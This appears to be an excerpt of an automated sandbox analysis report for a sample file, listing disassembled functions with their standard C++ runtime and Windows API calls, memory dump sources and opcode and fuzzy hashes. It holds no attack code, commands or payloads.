                                                                                                                                                                                                                                                  • Instruction ID: 0f2ff7600054c2020bc6807b4cbb559bf5985a94fe1b643ed0df56a19453bcf8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF0A4B69403603FF6113B797D9995A3FACDD46A633240636F811D2292EB75C5008A68
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C66D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                                  • String ID: <(@$<(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                  • API String ID: 2005118841-859722693
                                                                                                                                                                                                                                                  • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction ID: a061ea616c9574019159ec0f40f66c927ac9cef8fcde5d3cdfefebe65de0f9c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FF0FCB2900204AAC714DB54CC42FAB33985B11744F14857BEE11B61C3DA7DAD05C79C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                    • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 0043115C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004311CD
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004311E6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431218
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431221
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043122D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4275183328-0
                                                                                                                                                                                                                                                  • Opcode ID: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                                                  • Instruction ID: e2129b0906de41222375811faf8a10f30bb0ce812e5bc895f935e357d1a7b262
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1403a73044b2a32c4151c19e3ee42d3d20986d24228a641b3762fb9bf04db679
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBB12975A012199FDB24DF18C894AAEB7B4FB18304F1086EEE949A7360D775AE90CF44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,021325DC,00000001,00000001,?), ref: 021323E5
                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,021325DC,00000001,00000001,?,?,?,?), ref: 0213246B
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 02132565
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 02132572
                                                                                                                                                                                                                                                    • Part of subcall function 021338FE: RtlAllocateHeap.NTDLL(00000000,0210DACD,00000000), ref: 02133930
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0213257B
                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 021325A0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                                  • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                                                  • Instruction ID: 0a38d4e2c9dc6a613a5a974b382a8812dc51eebb68c003da96d964eb96db6374
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C851E172A80216AEDB26AE68CCA5EBE77ABEB44654F154228EC04D6150EB34DD40CA90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                                  • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                  • Instruction ID: be9d3b94be3af0b4fa162d112f8ade63deb3b79c8a8b3894b4406b1df48e7bac
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D515B36980215AFDF249F68CC40FAE77AEEF4D334F104269F815D6181EB31E529CAA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 02123041
                                                                                                                                                                                                                                                    • Part of subcall function 02118AA2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02118AAD
                                                                                                                                                                                                                                                  • SafeSQueue.LIBCONCRT ref: 0212305A
                                                                                                                                                                                                                                                  • Concurrency::location::_Assign.LIBCMT ref: 0212311A
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0212313B
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02123149
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3496964030-0
                                                                                                                                                                                                                                                  • Opcode ID: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                                                  • Instruction ID: 3221cd423c8fde33c961d06f584fa55d14c474abf891a9890b0766cc8c3d1db9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17bd562b5d5d9d9cfdfa562d227ccadc57b46c4ced5fec5b9a2592468eba907b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F831E231A406259FCB29EF64C880BAEB7B1FF44710F1145A9E8168B291DB74E859CFD4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 02128F67
                                                                                                                                                                                                                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 02128F80
                                                                                                                                                                                                                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 02128F87
                                                                                                                                                                                                                                                  • PMDtoOffset.LIBCMT ref: 02128FA6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1467055271-0
                                                                                                                                                                                                                                                  • Opcode ID: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                                                                                                                                                                  • Instruction ID: 4e30abab93c16265ce10fe0c71a2ee901fa788073aa7fcb25b9ac576edfcc727
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: be68cb40e55dd2292cbbce737d8ca9aab969a3a65d4eb3b761b4647cdf86019d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5210B726842249FDF18DF68DC45F6E77A6EF44710F268129FD1593180D731E928CAB4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1687354797-0
                                                                                                                                                                                                                                                  • Opcode ID: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                                  • Instruction ID: 4ad0405b518e857fee98f68054b77ddc933fe790dff3b995cc80c19e72007111
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c13552ddbe0b7b52b6219a3b6943351ceb5bdfd2161b5b6eba885959c9bb842
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB217471C44209AEDF15EBF4D884BDD7BFAAF08325F54401AD404B71C0DBB899448E75
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,761D42DF), ref: 00428DD8
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DE6
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428DFF
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00428DC1,00426752,00440690,00000008,004409F5,?,?,?,?,00423A3B,?,?,761D42DF), ref: 00428E51
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                  • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                                  • Instruction ID: 758f7159784acd0a18ffe6e4d50e04bfafef725c819603ece3ff961fbf0e5b5e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E001F53230A7316EA6242BF57C8966B2744EB0577AB60033FF510902E2EE198C20554D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,02129028,021269B9,021408F7,00000008,02140C5C,?,?,?,?,02123CA2,?,?,0045A064), ref: 0212903F
                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0212904D
                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02129066
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,02129028,021269B9,021408F7,00000008,02140C5C,?,?,?,?,02123CA2,?,?,0045A064), ref: 021290B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                                  • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                                  • Instruction ID: 1293667675877915ce34a9ee9e9664c22e4cfee0db7e2e0e414fb890239ef203
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7001F7321897356EA7282BB86C88A6B2759EF45776F300339F520451F1EF12883D998D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404D59
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00404D70
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404D79
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404DAA
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DC0
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DDE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                                  • Instruction ID: 1dda4c75b92fe2b5e69280e9b804bb78dd99b554210e3ff263920cc003329bbf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A11A3B19001249BCB15EBA0C841AEE77B4AF54319F20053EE912B72D2DB7C9A0587DD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 02104FC0
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 02104FD7
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFCA
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFE4
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 02104FE0
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 02105011
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 02105027
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02105045
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                                  • Instruction ID: e9e81adcebdc217049cf6613bea21ebf66d9c49e8cce156cde1f17b7e84ea601
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc97fafaeabc24e873c30a96ff4f067686464aa4fdbb848b338ca75cbaee6e9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A11EC32980228AFCF24EBA4D880AAD77B2BF04315F504429E811AB2D5CBB49A05CF90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040C190
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0040C1A7
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040C1B0
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040C1E1
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040C1F7
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C215
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction ID: fd9d6ee1f820b304f7f26aef446794e7afe4742a0815df37dede75514b3fc441
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b85ae294a9a7246c3ddfb9f5242bf4fb7b639a16bf2a11cfd9c9e350b2de321b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8117371D00229DBCB14EBA0C885AEE7764AF54315F20453EE411BB2D2DB7C9A05CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004054D9
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004054F0
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004054F9
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040552A
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00405540
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040555E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                                                  • Instruction ID: af26afd1e9f0003da21f47bd393f770a5ce721ed4ca6619ce042a6dd0fbef1f6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37f25b241d5d005f4bd9263ef804b6f161f9b1aae0f4e3bd922510fed2236106
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8711A071900628ABCB10EBA4CC41AAE7770AF54319F60053EE815BB2D2DB7C9E458F9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00405575
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0040558C
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00405595
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004055C6
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 004055DC
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004055FA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                                                  • Instruction ID: 4f98c6a968a786bbabe9cf8dd1bd77c0c3f582db622070c6a9572df94363bb86
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10c420daa13962d8c34f07d8e5e57f80696a88d0a8cb060a21b1ba5f72c37537
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B111A371900524ABCB14EBA1CC41AAE7770AF54315F20003FF812BB2D2DB7C9A05CB9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00404C1B
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00404C32
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD63
                                                                                                                                                                                                                                                    • Part of subcall function 0040BD52: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD7D
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00404C3B
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00404C6C
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C82
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CA0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
                                                                                                                                                                                                                                                  • Opcode ID: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                                  • Instruction ID: 4433383583620685c096cb23b62731a72f637e788ffb24460987deb82302b81b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbee11b85212c1946a48863dbeb689ab616e1a132dcf9646d1dd5c10258ca5ca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FE11C671D001249BCB14EBA0C845AED77B4AF54315F20003EE911B72D2DB7C9D04CB9C
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0210C3F7
                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0210C40E
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::_Lockit.LIBCPMT ref: 0210BFCA
                                                                                                                                                                                                                                                    • Part of subcall function 0210BFB9: std::_Lockit::~_Lockit.LIBCPMT ref: 0210BFE4
                                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0210C417
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0210C448
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0210C45E
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0210C47C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2243866535-0
